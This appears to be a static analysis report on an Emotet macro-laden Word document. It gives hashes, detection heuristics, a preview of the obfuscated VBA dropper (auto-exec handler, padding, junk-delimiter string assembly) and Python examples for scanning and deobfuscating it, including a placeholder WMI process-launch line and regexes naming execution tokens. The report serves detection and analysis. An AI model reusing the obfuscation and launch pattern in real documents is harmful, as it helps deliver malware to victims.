Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 5efbe54ebbe4c471…

MALICIOUS

Office (OLE)

Size: 244.3 KB
Created: 2020-01-16 22:41:00
Authoring application: Microsoft Office Word
First seen: 2020-07-24
MD5: c45709822998f93a45c9364e0b9cf995
SHA-1: 513eedef38a953c7cb502df81cb04037732ca44f
SHA-256: 5efbe54ebbe4c47186e636c70d9dafda764e37d0f7dd36ef9d032c23d01423b4
Risk Score: 202

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

The file contains VBA macros, among them a Document_open handler that calls Lvpcgwokshh and runs automatically once the document is opened with macros enabled. ClamAV identifies the document as Emotet, a well-known downloader family. The visible macro source is padded with Do While loops whose conditions (uninitialised variables compared with constants) are never true and whose bodies are unused arithmetic; the real work in Teupaekd() concatenates ChrW(wdKeyP) (the letter "P": wdKeyP is 80 in Word's WdKey enumeration) with two properties of the UserForm Xhrcwkmbidam and the Tag of one of its controls, then removes the junk delimiter "9_msnnj883hn///" with Split/Join. That is the standard Emotet pattern of storing a PowerShell command in form controls and launching it via GetObject (the call itself falls in the truncated part of the listing), with the aim of downloading and running a second-stage payload.

Heuristics (6)

  • ClamAV: Doc.Downloader.Emotet-7543223-0 critical CLAMAV_DETECTION
    ClamAV signature match: Doc.Downloader.Emotet-7543223-0 (Emotet document downloader)
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code (the related macro findings below are derived from it)
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open handler present; Word runs it as soon as the document is opened with macros enabled, with no further user action
  • GetObject call high OLE_VBA_GETOBJ
    GetObject() call; macro droppers commonly use it to obtain a COM/WMI object (e.g. a winmgmts: Win32_Process) and launch a command without calling Shell()
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code) / cache stream contains an auto-execution token together with shell, download or object-execution tokens. Because this rule works on the compiled form, it still fires on p-code-only documents (VBA stomping) or when source extraction fails and no readable source is available.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. A URL is not a detection by itself; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body); this is the DrawingML XML namespace, expected in any document with drawing content, not a network indicator
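The source-level rules above (auto-exec handler, execution tokens, junk-delimiter Split/Join, dead-code padding) can be reproduced in a few lines of Python. The following is an added example, not the analysis platform's own rule engine: it scans a constructed VBA fragment modelled on the shape of the extracted macro (the GetObject launch line is a placeholder, since the sample's own launch lies in the truncated part of the listing). In practice the source string would come from oletools' VBA_Parser(path).extract_macros(); note that any source-only scanner is blind to p-code-only (stomped) documents, which is exactly what the OLE_VBA_PCODE_AUTOEXEC_EXEC rule and tools such as pcodedmp cover.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    rule: str       # rule id, named after the report's heuristic ids where one exists
    severity: str
    detail: str


# Entry points Office runs with no user interaction once macros are enabled.
AUTOEXEC_RE = re.compile(
    r"\b(?:Document_Open|Document_Close|AutoOpen|Auto_Open|AutoClose|AutoExec|Workbook_Open)\b", re.I)
# Tokens that create or drive an execution / download channel.
EXEC_RE = re.compile(
    r"\b(?:GetObject|CreateObject|Shell|WScript\.Shell|winmgmts|Win32_Process|"
    r"URLDownloadToFile|powershell|cmd\.exe)\b", re.I)
# Split(..., "<long junk literal>") later Join'd with "": the delimiter-stripping trick seen in this sample.
JUNK_SPLIT_RE = re.compile(r'Split\s*\(.*?,\s*"([^"]{8,})"\s*\)', re.I)
# name = Chr(4) / Sqr(9) + x / CLng(y) / Int(1 + 1) / CDate(z) / 9 + Int(4): arithmetic whose result is never used.
PADDING_RE = re.compile(r"^\s*\w+\s*=\s*(?:\d+\s*\+\s*)?(?:Chr|Sqr|CLng|Int|CDate)\s*\(", re.I)

# Constructed VBA, NOT the sample's code: same auto-exec handler, one padding loop pair and
# the Split/Join line, plus a placeholder GetObject launch so the rule combination is visible.
SAMPLE_VBA = '''Attribute VB_Name = "Frjpossu"
Private Sub Document_open()
Lvpcgwokshh
End Sub

Function Teupaekd()
   Do While Fgqqpushblnf = 900
            Miibxfajx = Chr(4)
            Jnitsaprsswrt = Sqr(9) + Plmepgdku
            Mirsagei = CLng(Wablkrxppro)
            Qpxsxpfcoapn = Int(1 + 1)
            Zrqmkyptllseo = CDate(QKoWc)
            Ebovqbddnhsh = 9 + Int(4)
   Loop
   Do While Zmydsyxze = 2 + 4
            Cxdmzsbzgjza = CLng(Yvocfsrdlmy)
            Vhyfxldn = Int(1 + 4)
            Rnorifyzmfmuc = 2 + Int(3)
            Ylbymrnfrfrid = Chr(6)
            Pduvworaixn = Sqr(7) + Oobfojyzco
            Eixlrxuxw = CDate(QKoWc)
   Loop
Uccbmfmc = ChrW(wdKeyP)
Yaiciqbtusvb = Split(Uccbmfmc + Xhrcwkmbidam.Qwvuacqmitdz, "9_msnnj883hn///")
Teupaekd = Join(Yaiciqbtusvb, "")
End Function

Sub Lvpcgwokshh()
' placeholder launch line (constructed); the sample's own launch is in the truncated listing
Set Hgx = GetObject("winmgmts:Win32_Process").Create(Teupaekd())
End Sub
'''


def scan_vba(source: str) -> list[Finding]:
    """Run the four source-level heuristics over decoded VBA source."""
    findings: list[Finding] = []
    for name in sorted({m.group(0) for m in AUTOEXEC_RE.finditer(source)}, key=str.lower):
        findings.append(Finding("OLE_VBA_AUTOEXEC", "high", f"auto-execution handler {name}"))
    for tok in sorted({m.group(0) for m in EXEC_RE.finditer(source)}, key=str.lower):
        rule = "OLE_VBA_GETOBJ" if tok.lower() == "getobject" else "OLE_VBA_EXEC_TOKEN"
        findings.append(Finding(rule, "high", f"execution token {tok}"))
    for m in JUNK_SPLIT_RE.finditer(source):
        findings.append(Finding("OLE_VBA_JUNK_SPLIT", "medium", f'Split/Join junk delimiter "{m.group(1)}"'))
    lines = [ln for ln in source.splitlines() if ln.strip()]
    padding = sum(1 for ln in lines if PADDING_RE.match(ln))
    if lines and padding / len(lines) > 0.25:
        findings.append(Finding("OLE_VBA_DEAD_CODE", "low",
                                f"{padding}/{len(lines)} non-blank lines are unused arithmetic padding"))
    return findings


def verdict(findings: list[Finding]) -> str:
    """Auto-exec plus an execution channel is the combination that matters; either alone is only suspicious."""
    rules = {f.rule for f in findings}
    if "OLE_VBA_AUTOEXEC" in rules and rules & {"OLE_VBA_GETOBJ", "OLE_VBA_EXEC_TOKEN"}:
        return "malicious-likely"
    return "suspicious" if rules else "clean"


if __name__ == "__main__":
    for f in scan_vba(SAMPLE_VBA):
        print(f"{f.rule:<26} {f.severity:<7} {f.detail}")
    print("verdict:", verdict(scan_vba(SAMPLE_VBA)))
```

The padding ratio is a cheap but useful signal on its own: legitimate macros rarely consist mostly of assignments to variables that are never read.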

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind        Source                                               Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)  11391 bytes
            SHA-256: 96f1342f3a85a2642cc02aa496a2a5e65ca463d41f0d2bd6e8b2e5ffbb004c16
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Frjpossu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Lvpcgwokshh
End Sub

Attribute VB_Name = "Xhrcwkmbidam"
Attribute VB_Base = "0{385352DE-0D9E-4955-9962-2BCDB0EA3053}{1090BE7C-F755-4A7D-B057-D19E8388E4A1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Yokxdhzeadumj"
Function Teupaekd()
   Do While Fgqqpushblnf = 900
            Do While Kdrfvbettmaj = 3 + 2
            Miibxfajx = Chr(4)
            Jnitsaprsswrt = Sqr(9) + Plmepgdku
            Mirsagei = CLng(Wablkrxppro)
            Qpxsxpfcoapn = Int(1 + 1)
            Zrqmkyptllseo = CDate(QKoWc)
            Ebovqbddnhsh = 9 + Int(4)
            Loop
            Do While Zmydsyxze = 2 + 4
            Cxdmzsbzgjza = CLng(Yvocfsrdlmy)
            Vhyfxldn = Int(1 + 4)
            Rnorifyzmfmuc = 2 + Int(3)
            Ylbymrnfrfrid = Chr(6)
            Pduvworaixn = Sqr(7) + Oobfojyzco
            Eixlrxuxw = CDate(QKoWc)
            Loop
Loop
Uccbmfmc = ChrW(wdKeyP)
   Do While Akjooyim = 900
            Do While Vhukdghadujn = 3 + 2
            Tzxcskghhau = Chr(4)
            Fmpmncntcx = Sqr(9) + Gksiftny
            Oagtmnoaupqwc = CLng(Hvkyvqbkcma)
            Cggpojypguqzf = Int(1 + 1)
            Xjjhfuxy = CDate(QKoWc)
            Zfmqdhmaoyoib = 9 + Int(4)
            Loop
            Do While Pzbbuzpnymsc = 2 + 4
            Fehdpodlz = CLng(Dzqepoibopv)
            Iajsodketsjtg = Int(1 + 4)
            Tpezznqzzi = 2 + Int(3)
            Kaerkikupelwv = Chr(6)
            Khgkjjxiz = Sqr(7) + Wjsakjgfaeoa
            Wkwodhehff = CDate(QKoWc)
            Loop
Loop
Tvsghavnh = Uccbmfmc + Xhrcwkmbidam.Qwvuacqmitdz + Xhrcwkmbidam.Yhzeupamsvbu
   Do While Tzwmczccxhnu = 900
            Do While Obrmdzrb = 3 + 2
            Homjxyoxux = Chr(4)
            Mqvwtniuepybd = Sqr(9) + Kxsasgneontf
            Pzdjqpbrgfes = CLng(Sqkgmdea)
            Zrymgjahkbppu = Int(1 + 1)
            Vtsrmvzijmy = CDate(QKoWc)
            Suooxfjyqp = 9 + Int(4)
            Loop
            Do While Fwixpcvstrklj = 2 + 4
            Ajpzhhnp = CLng(Asoioeehuh)
            Kujcjtakdfh = Int(1 + 4)
            Obpcprhsko = 2 + Int(3)
            Kenfdoicj = Chr(6)
            Qfxuofiukkya = Sqr(7) + Efpsxafzvzp
            Arzazpgzx = CDate(QKoWc)
            Loop
Loop
Fack = Xhrcwkmbidam.Diwqqciyfbjs.Tag
Yaiciqbtusvb = Split(Tvsghavnh + LTrim(LTrim(Fack)), "9_msnnj883hn///")
   Do While Gtluehttyjwf = 900
            Do While Mbsmqkodfl = 3 + 2
            Sdkzqdlxht = Chr(4)
            Krybdafvmdyib = Sqr(9) + Wfcnzetppjyt
            Vfsbtcymmaeg = CLng(Pfcydiprffaur)
            Sehlcqyfgh = Int(1 + 1)
            Kscjtktzkgapk = CDate(QKoWc)
            Znbzlwdu = 9 + Int(4)
            Loop
            Do While Uriravrsmezcw = 2 + 4
            Xcylesbyny = CLng(Izzgygmys)
            Kljwxyewq = Int(1 + 4)
            Ntfjrettvti = 2 + Int(3)
            Tnybwjirmt = Chr(6)
            Uwdzibbl = Sqr(7) + Fbopifzopc
            Dkadaglw = CDate(QKoWc)
            Loop
Loop
Teupaekd = Kituusaycmicc + Join(Yaiciqbtusvb, "") + Kituusaycmicc
   Do While Ohorrikgdqkt = 900
            Do While Gijraatkedus = 3 + 2
            Mmssfaskyob = Chr(4)
            Ecyruabajgsw = Sqr(9) + Dclxzcvu
            Solbwkvqnioig = CLng(Reodfavozohmq)
            Wkkaygpaez = Int(1 + 1)
            Jhmvwyyi = CDate(QKoWc)
            Qlxwzmmox = 9 + Int(4)
            Loop
            Do While Cmexgnsbeje = 2 + 4
            Lhmtlnssnptzc = CLng(Cnpbfnhvh)
            Lfgsxmqylsz = Int(1 + 4)
            Jmvpxlyd = 2 + Int(3)
            Zrucplemfv = Chr(6)
 
... (truncated)
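The string assembly in Teupaekd() can be replayed outside Word to recover the command without running the macro. The example below is added here and is not the sample's code or an oletools routine: it re-implements the visible steps (ChrW(wdKeyP), two UserForm properties, the LTrim'd Tag, Split on "9_msnnj883hn///", Join with "") and also pulls Split() delimiters out of arbitrary macro source so the same strip can be applied to strings harvested from the form streams (olevba's VBA_Parser.extract_form_strings() lists those). The control values are constructed placeholders carrying a harmless command, because the real ones live in the UserForm stream and are not on this page; Kituusaycmicc is assumed to be an unassigned Variant (empty string), which may not hold in the truncated code.

```python
import re

# Junk delimiter copied from the extracted macro's Split() call.
DELIMITER = "9_msnnj883hn///"
# Word's WdKey enumeration: wdKeyP = 80, so ChrW(wdKeyP) is "P".
WD_KEY_P = 80

# Constructed stand-in for the UserForm Xhrcwkmbidam's control values (NOT the
# sample's real values). The delimiter is sprinkled in the way Emotet does it.
FORM_CONTROLS = {
    "Qwvuacqmitdz": "owe" + DELIMITER + "rshe",
    "Yhzeupamsvbu": "ll -NoProf" + DELIMITER + "ile -Command ",
    "Diwqqciyfbjs.Tag": "   Write-Out" + DELIMITER + "put 'hello'",
}


def teupaekd(controls: dict, delimiter: str = DELIMITER, wrapper: str = "") -> str:
    """Replay of the visible Teupaekd() logic.

    wrapper stands for Kituusaycmicc, assumed empty (unassigned Variant).
    """
    head = chr(WD_KEY_P) + controls["Qwvuacqmitdz"] + controls["Yhzeupamsvbu"]
    tag = controls["Diwqqciyfbjs.Tag"].lstrip(" ")      # LTrim strips leading spaces only; LTrim(LTrim(x)) == LTrim(x)
    parts = (head + tag).split(delimiter)               # Split(..., delimiter)
    return wrapper + "".join(parts) + wrapper            # Join(parts, "") wrapped in Kituusaycmicc


def find_junk_delimiters(vba_source: str) -> list[str]:
    """Return every string literal used as the delimiter of a Split() call."""
    return re.findall(r'Split\s*\([^"]*?,\s*"([^"]+)"\s*\)', vba_source)


def strip_delimiters(s: str, delimiters: list[str]) -> str:
    """Apply the Split/Join("") effect of each delimiter to a harvested form string."""
    for d in delimiters:
        s = s.replace(d, "")
    return s


# The exact Split() line from the extracted macro, used to show delimiter recovery.
MACRO_LINE = 'Yaiciqbtusvb = Split(Tvsghavnh + LTrim(LTrim(Fack)), "9_msnnj883hn///")'

if __name__ == "__main__":
    delims = find_junk_delimiters(MACRO_LINE)
    print("delimiters:", delims)
    print("recovered :", teupaekd(FORM_CONTROLS, delims[0]))
```

Once the delimiters are known, the quickest triage is to run strip_delimiters() over every form string olevba extracts and grep the result for "powershell", "-e" / "-enc", and "http" rather than reconstructing the concatenation order by hand.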